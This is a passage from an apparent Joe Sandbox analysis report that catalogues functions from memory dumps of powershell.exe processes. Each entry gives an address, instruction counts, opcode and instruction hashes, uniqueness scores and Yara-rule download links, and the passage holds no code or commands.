                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7e8979060318ae77dcff78815243f7c17d753071d027f92f6924fbaf2bc66bca
                                                                                              • Instruction ID: 3fd84cefec29146631186362b56cd5bff033a8cb71cedb08871d74a33c596de0
                                                                                              • Opcode Fuzzy Hash: 7e8979060318ae77dcff78815243f7c17d753071d027f92f6924fbaf2bc66bca
                                                                                              • Instruction Fuzzy Hash: 08014CB17452065FA75597F6A8678AB7BDAEFC566430440BFF00DC7711EE20DC0287A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AFBAF, Relevance: .1, Instructions: 53COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 54021f518ed117c4ac3fd41cd08b1621f0b2dc28c76994269c3923d02d8a7d9c
                                                                                              • Instruction ID: 0cf41e466e74090862b04ee9c128f1919e773a74f71c06162853948e661d8808
                                                                                              • Opcode Fuzzy Hash: 54021f518ed117c4ac3fd41cd08b1621f0b2dc28c76994269c3923d02d8a7d9c
                                                                                              • Instruction Fuzzy Hash: 14119E75A00214DFCB50DFA9D8409DEFBF5FB8D321B10806AE918E3340D3359902CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 075360AF, Relevance: .1, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 258aeb8e7e0d3b61f573ed9e3706abe35ddc86b3a35049ca4dd64162521a48a7
                                                                                              • Instruction ID: 81aa9c87560bc92b699b528e2353b167b64d6c1b08ab41645c695885fbc5ee9f
                                                                                              • Opcode Fuzzy Hash: 258aeb8e7e0d3b61f573ed9e3706abe35ddc86b3a35049ca4dd64162521a48a7
                                                                                              • Instruction Fuzzy Hash: 9501D6B6B40711ABCB20EBA445116AE7396EB81B58F08A45BDA029F351DB718C0187E6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073ABCC0, Relevance: .1, Instructions: 52COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5fad9b77ef00b9cb5cc248904ee45e56ea7740f2030d14a75fbc79d9f2f6b70a
                                                                                              • Instruction ID: 849a02fc1bf1c588e35b49b360fb134d0d4d98b009879c3283f49cafe8716443
                                                                                              • Opcode Fuzzy Hash: 5fad9b77ef00b9cb5cc248904ee45e56ea7740f2030d14a75fbc79d9f2f6b70a
                                                                                              • Instruction Fuzzy Hash: 5D018FF6740511AF9618DE2EE495D2AF3EFEFD5621724806AE10ACB334DE61DC028791
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AF25C, Relevance: .0, Instructions: 49COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5a8df7221f7a778f538c64d7ffad3b7da2c335c5c8fe814888bcfe777af6fabe
                                                                                              • Instruction ID: ae1e9bfd5ca1687610f4c73c8c1d2f57368a74c79cddcb6f424e30c2a3e78901
                                                                                              • Opcode Fuzzy Hash: 5a8df7221f7a778f538c64d7ffad3b7da2c335c5c8fe814888bcfe777af6fabe
                                                                                              • Instruction Fuzzy Hash: 4901843290A3A56FCB128A645C148EA3FB5DF4B27070940DBF988D76A2D6244916D7A2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AFB31, Relevance: .0, Instructions: 46COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d4c1272360ab89e4774dae40bd2fb3965fbbfafc5e8417c1ed71864997ec4a82
                                                                                              • Instruction ID: 60e4a9fbf6dc9d2081f89f09435f0d96bd972b7f3f2c736aeb3602b8966a92e4
                                                                                              • Opcode Fuzzy Hash: d4c1272360ab89e4774dae40bd2fb3965fbbfafc5e8417c1ed71864997ec4a82
                                                                                              • Instruction Fuzzy Hash: 6A1180746042068FDB05CF59C8A4BAEF771FF89314F258599D5199B3A2C73AEC42CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0078D01D, Relevance: .0, Instructions: 45COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.454792708.000000000078D000.00000040.00000001.sdmp, Offset: 0078D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_78d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 715fad5f2763a8a007ba846a09ed2f701f04dfcd65f778f029be895903adf51b
                                                                                              • Instruction ID: 6d16be7abfef7d9f9c3dd39b3002dd059d6a8f9d4b6ebc23b7fc739a909d1341
                                                                                              • Opcode Fuzzy Hash: 715fad5f2763a8a007ba846a09ed2f701f04dfcd65f778f029be895903adf51b
                                                                                              • Instruction Fuzzy Hash: E901F231548384AAEB209E25DCC4B77BB98EF41768F18C51AED055B2C2C37D9C05CBB1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AB077, Relevance: .0, Instructions: 44COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 42688d7a9764b5e3858d46c763a8778109980e792f589664a8fdd3440496a765
                                                                                              • Instruction ID: 9b0cd11fb19c415615b87a9d5ed200c68a2b96a1eaf66e2a660b2eddc8205a3a
                                                                                              • Opcode Fuzzy Hash: 42688d7a9764b5e3858d46c763a8778109980e792f589664a8fdd3440496a765
                                                                                              • Instruction Fuzzy Hash: 2F01B1F0B10205EFEF54EE34D885BA9B7A5FF44210F00047ACD298B246E7319804CB52
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073ABC20, Relevance: .0, Instructions: 40COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 04e3570b084230d61b4342a4b3704850e32b880557b0bdb86622516fe85337a2
                                                                                              • Instruction ID: 3d2a979b0c883a62dcea7df4b12b425a526c5beb493cd755f2beaacdaf3b71c6
                                                                                              • Opcode Fuzzy Hash: 04e3570b084230d61b4342a4b3704850e32b880557b0bdb86622516fe85337a2
                                                                                              • Instruction Fuzzy Hash: 50F0E2B5B405109BC608A62ED054D2EF3EFEFC9A22724C07AE149CB334DE71DC028280
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0078D01C, Relevance: .0, Instructions: 36COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.454792708.000000000078D000.00000040.00000001.sdmp, Offset: 0078D000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_78d000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c7697f5cead81f1a6df5089e48c9c8f4cd0373639b530b3229468e9d2f105267
                                                                                              • Instruction ID: cf9d2313bc2d80135df5d69754917baf091e31b9fe93ff9f30d5572fc425cfca
                                                                                              • Opcode Fuzzy Hash: c7697f5cead81f1a6df5089e48c9c8f4cd0373639b530b3229468e9d2f105267
                                                                                              • Instruction Fuzzy Hash: DEF06271404384AEEB248E15CC84B67FF98EB52764F18C55AED485B2C6C3799C45CBB1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AFBB8, Relevance: .0, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 46040c63b470aed2b627606c2d30185ca7f0e11bf63dcc3b3ddf94432e49d504
                                                                                              • Instruction ID: a44e18e6f939caa1dbcbc84ad598f0ae3a649f06ebcdb365ab865faf24273007
                                                                                              • Opcode Fuzzy Hash: 46040c63b470aed2b627606c2d30185ca7f0e11bf63dcc3b3ddf94432e49d504
                                                                                              • Instruction Fuzzy Hash: 9BF01975900758DFCB54DFA9C80499EBBF5FF89211B10846AE949E3310D735A901CFA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AB933, Relevance: .0, Instructions: 34COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 59b6691400da829cfe20d9057bd2b80f52dd80ea8074a96b4f5ff64224f5aa6e
                                                                                              • Instruction ID: 0ff4123cd5e0d4cbcd1bde4b8c724744ba8e9b48420db4a8448697908091993b
                                                                                              • Opcode Fuzzy Hash: 59b6691400da829cfe20d9057bd2b80f52dd80ea8074a96b4f5ff64224f5aa6e
                                                                                              • Instruction Fuzzy Hash: 0BF0A0B2B092645FC3009769E844D9FBBB9EB8A671B114157E00CC7361CA31CD018394
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AE1E7, Relevance: .0, Instructions: 31COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 991eb99e85aa108acba2c46188e87d9ee3a67b672868f4e6d1b0958f2479f7e5
                                                                                              • Instruction ID: bd251d82fe11c0f2dcee3e3ac944a91b9ba6b65bd00e89f7c4840c7a6c1f979d
                                                                                              • Opcode Fuzzy Hash: 991eb99e85aa108acba2c46188e87d9ee3a67b672868f4e6d1b0958f2479f7e5
                                                                                              • Instruction Fuzzy Hash: FDE0927230A3605FC3165B6AB85E89BFFEAEEC956430405ABF05AC3251DA245D02C7A6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073ABC10, Relevance: .0, Instructions: 29COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 574363a63cbcd4e21d2a74d78735188ab1682012f34c482ad0c10f0cebf4e9db
                                                                                              • Instruction ID: ad12969f411690eaed5461305bc0b041cc29f58d82278f797c91a6e5969834fa
                                                                                              • Opcode Fuzzy Hash: 574363a63cbcd4e21d2a74d78735188ab1682012f34c482ad0c10f0cebf4e9db
                                                                                              • Instruction Fuzzy Hash: DDE068303055106BC300963ED844E4ABFDE8FCA632F1880B7E10CCB326DDA1CC0042A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 075301E2, Relevance: .0, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c3c2cb625eaba0bf18954e53e65d3aa5e48eb8e0b33cec0403912e506aa313bb
                                                                                              • Instruction ID: d2f2b84ecd2341530289e779b6b676e26bf66015a63051c4f0a0c8fa78ded180
                                                                                              • Opcode Fuzzy Hash: c3c2cb625eaba0bf18954e53e65d3aa5e48eb8e0b33cec0403912e506aa313bb
                                                                                              • Instruction Fuzzy Hash: 74E0D8767102166BDA90A7A85C51F7E624BD7C8314B415035EA06E7280CFA50DD243F5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 075352BD, Relevance: .0, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462491668.0000000007530000.00000040.00000010.sdmp, Offset: 07530000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_7530000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7397c3bf3632b9d93c4729a256389a48f1f6b323ef707cd6bda44e40a1de9f27
                                                                                              • Instruction ID: dc65438765a2d67f8c1922e87823f228873e7223ef2efee420c2b3d9d7f52d28
                                                                                              • Opcode Fuzzy Hash: 7397c3bf3632b9d93c4729a256389a48f1f6b323ef707cd6bda44e40a1de9f27
                                                                                              • Instruction Fuzzy Hash: 04E0D8B67502143B9A90A7AC5C51ABE629AC7C8714B455039E606A7281CFA1099643B6
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AF290, Relevance: .0, Instructions: 27COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 8fc142ce88d1015fab6ae6016f622eeea8476c2fc6ebad5689fff53f36e4c801
                                                                                              • Instruction ID: 103d2fb1b4c8dffab5e9e813f1c485a204a20d12dbe91242a3ec8f635f846845
                                                                                              • Opcode Fuzzy Hash: 8fc142ce88d1015fab6ae6016f622eeea8476c2fc6ebad5689fff53f36e4c801
                                                                                              • Instruction Fuzzy Hash: E7E0127360011DBF4F059E959C04CEF7FAEEB882607048026FE18C2210DB318921EBA4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AAFA8, Relevance: .0, Instructions: 26COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5934f1ee33a38e0778b137a6804bdebb014403cae36b302c7368a4a6b131ee6f
                                                                                              • Instruction ID: e4a5cfd628a5da127c2234dbf2a9917d48a2ca3bf581a7ec76a559905dca7559
                                                                                              • Opcode Fuzzy Hash: 5934f1ee33a38e0778b137a6804bdebb014403cae36b302c7368a4a6b131ee6f
                                                                                              • Instruction Fuzzy Hash: 52E0D8363016205BC7151748FC0969DBB5ADFCC721744002BED4DC3242DF3058428B9D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AE1F8, Relevance: .0, Instructions: 24COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7f1fd9858cd16ccb3819d8e777e049c3182c08e50fd0ac8b2e05c22175a6cf81
                                                                                              • Instruction ID: f17e6eb5d69d122c9000fb0edd43a1f2113dd7722b9afc66884eff50895ad035
                                                                                              • Opcode Fuzzy Hash: 7f1fd9858cd16ccb3819d8e777e049c3182c08e50fd0ac8b2e05c22175a6cf81
                                                                                              • Instruction Fuzzy Hash: CEE012723055105B821457AFA84D86BFBDFFBCC5253540526F50EC3350DE646C01C5A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AED98, Relevance: .0, Instructions: 24COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0a16694ca28539d7f2a54066ebd6530dcd9fef8313aa6099bc5796a5835937a9
                                                                                              • Instruction ID: dc4d9a2671709bbd35b6dd1020a48ebf6dc639627138eb0fc5fa0e4152f9e88c
                                                                                              • Opcode Fuzzy Hash: 0a16694ca28539d7f2a54066ebd6530dcd9fef8313aa6099bc5796a5835937a9
                                                                                              • Instruction Fuzzy Hash: CEE08C267022604FC7016BA8A9548AE3BA64F9B655389009BE149EF366CA2D9E014B91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073ABCB1, Relevance: .0, Instructions: 23COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0df228ff0f2854c631a75fae663d282fa6678a2751fa59d40b7769abfb94188b
                                                                                              • Instruction ID: bd3ba9125f8cea1ede6b439ee06426d3ebc3471e34be9adb7a81603ee26918b3
                                                                                              • Opcode Fuzzy Hash: 0df228ff0f2854c631a75fae663d282fa6678a2751fa59d40b7769abfb94188b
                                                                                              • Instruction Fuzzy Hash: B4E026317045508BC7049A0DD850B0ABB8ADFD7222F1400B7E50CCF3A5CAA18C014B91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AAFE9, Relevance: .0, Instructions: 22COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6f15959a7395dddbe1696ce99e0defe07053af3016f42f3d5e1ab8be3742f7d3
                                                                                              • Instruction ID: c5f10d7cec7770cd3e67fc376602365d9597e399a97033fe3bea63947d0e9775
                                                                                              • Opcode Fuzzy Hash: 6f15959a7395dddbe1696ce99e0defe07053af3016f42f3d5e1ab8be3742f7d3
                                                                                              • Instruction Fuzzy Hash: E3E07DB29053018FC7304674FC09B753B819FC1251B0C007AD808CBA10C6258442C760
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AC780, Relevance: .0, Instructions: 20COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1d3aacfccd77466251d4be7ee3309beba74fac04fb4c3fe51ce3f51de25d8456
                                                                                              • Instruction ID: 342f34219c46d9a020c1290a05aa67902ca065d5e92c20e58fb55c2e26f6f951
                                                                                              • Opcode Fuzzy Hash: 1d3aacfccd77466251d4be7ee3309beba74fac04fb4c3fe51ce3f51de25d8456
                                                                                              • Instruction Fuzzy Hash: 61D022E800F3D43ED3936A382C519E6BF1C4C02C1138450EBE88C87013CB26C44482F9
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AAFB8, Relevance: .0, Instructions: 19COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: cf8ae77b46fd4d8b0e924236e468d7288c441dda0c08e2acace7eb4d98cbd712
                                                                                              • Instruction ID: c6e22175fbc7322f2ad50c6f0d261a6d57f023300e9b31fd4e0c4ca54a39f357
                                                                                              • Opcode Fuzzy Hash: cf8ae77b46fd4d8b0e924236e468d7288c441dda0c08e2acace7eb4d98cbd712
                                                                                              • Instruction Fuzzy Hash: 57D09E353006245B47092699B81C56E7B9BEFCDB22354402AEA0AD3341DF754D428ADD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AEDA8, Relevance: .0, Instructions: 18COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: a339fe86335f3909d4de793a4785005bfbcfd6f2aab3bb1bb2bbcb1028faf5d7
                                                                                              • Instruction ID: fd2b31bb8cefed865fbbdbfa507af845921ad4f21690fc6acb661a9fe8129988
                                                                                              • Opcode Fuzzy Hash: a339fe86335f3909d4de793a4785005bfbcfd6f2aab3bb1bb2bbcb1028faf5d7
                                                                                              • Instruction Fuzzy Hash: C5D0A7317001305BC70077BDE80586E37DA8F8B6647C00069E106DF351CE2DEC0107D5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AB060, Relevance: .0, Instructions: 8COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 3f2962bd75802d0d6211ec2332be0d72fd983d775c939b224f1b8ddf99686335
                                                                                              • Instruction ID: 4578d40a194600b2bc987384f9c3afd6b4393442d71371502c7cc4f6edf710ba
                                                                                              • Opcode Fuzzy Hash: 3f2962bd75802d0d6211ec2332be0d72fd983d775c939b224f1b8ddf99686335
                                                                                              • Instruction Fuzzy Hash: 04B092F02205618FDF508E328505E257BA0BB4629230940E5E4A8CA262DB28C600EA20
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 073AC790, Relevance: .0, Instructions: 6COMMON
                                                                                              Download Yara Rule
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000C.00000002.462236800.00000000073A0000.00000040.00000010.sdmp, Offset: 073A0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_12_2_73a0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4f0f2cb27c7f5f5469bb1e3b7fd12c434d9b38cd4b0739b73e183d9a04f15551
                                                                                              • Instruction ID: 1b3f88ab1c685251a18b6e69d43f9dc69a48164ead85ee915ee436d0ee75a7fe
                                                                                              • Opcode Fuzzy Hash: 4f0f2cb27c7f5f5469bb1e3b7fd12c434d9b38cd4b0739b73e183d9a04f15551
                                                                                              • Instruction Fuzzy Hash: 30A0223000830C8F830023B03808EA8330C80808223C0C028E00C83000CF3AE02080C8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              Analysis Process: powershell.exe PID: 5972 Parent PID: 2880 powershell.exeCOMMON

                                                                                              Executed Functions

                                                                                              Function 037D1189, Relevance: 2.6, Strings: 2, Instructions: 55COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: HrTh$HrTh
                                                                                              • API String ID: 0-4263598045
                                                                                              • Opcode ID: cc244acf2eab8cd4471a6f170d6a4a2e0a722338547ecb648690c615c162c556
                                                                                              • Instruction ID: 7978d81b3eda1b1349d07d509971242486b664004a5a13a84f48a211f0d0829d
                                                                                              • Opcode Fuzzy Hash: cc244acf2eab8cd4471a6f170d6a4a2e0a722338547ecb648690c615c162c556
                                                                                              • Instruction Fuzzy Hash: 6C11A53930074147DB50EB78D494ABF73A6AFC2214B88993DD51A9F244EFA5AE0547C0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 037D1198, Relevance: 2.6, Strings: 2, Instructions: 54COMMON
                                                                                              Download Yara Rule
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000E.00000002.452058876.00000000037D0000.00000040.00000001.sdmp, Offset: 037D0000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_14_2_37d0000_powershell.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: HrTh$HrTh
                                                                                              • API String ID: 0-4263598045
                                                                                              • Opcode ID: 89d5671cc3767cc6636f48363c8f81bf277ad7c10051a683fa71c13687be68f6
                                                                                              • Instruction ID: 436f7192a238eafc6e2166285f12484455dd9a1913f2453c992a703fdbac143e
